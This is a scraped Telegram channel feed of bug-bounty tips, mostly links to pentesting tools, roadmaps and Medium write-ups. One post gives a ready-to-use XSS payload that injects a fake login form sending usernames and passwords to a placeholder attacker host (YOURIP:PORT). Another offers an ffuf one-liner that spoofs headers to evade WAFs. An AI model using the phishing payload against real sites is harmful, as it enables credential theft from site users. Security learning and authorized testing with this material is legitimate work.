Bug bounty Tips
Ir al canal en Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Mostrar más5 948
Suscriptores
+1324 horas
+947 días
+34930 días
Archivo de publicaciones
5 949
☄️Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.
🚨https://github.com/ifconfig-me/subowner
5 949
❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap
5 949
Repost from The Bug Bounty Hunter
Pentesting for Web Applications
https://www.hackerone.com/penetration-testing/web-applications
5 949
Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904
5 949
How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull’s Bug Bounty…: https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5
5 949
Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5
5 949
xss preventing steps from front end and back end.
Input Validation
the web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:
Code: javascript
function validateEmail(email) {
const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test($("#login input[name=email]").val());
}
As we can see, this code is testing the email input field and returning true or false whether it matches the Regex validation of an email format.5 949
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss
'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--5 949
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
5 949
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
5 949
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643
5 949
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get a real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱Github: 🔗Link
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
5 949
try this amazing FFUF Oneliner that i use mostly to bypass WAfs and for good & refine results for information disclosure bugs. you can use any wordlist:
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "X-Forwarded-For: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-Host: localhost" -t 100 -r -o results.json
5 949
Exploring Deserialization Attacks and Their Effects
https://haymiz.dev/security/2024/09/07/deserialization-attacks/
5 949
A very easy bug anyone can find: https://medium.com/@malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
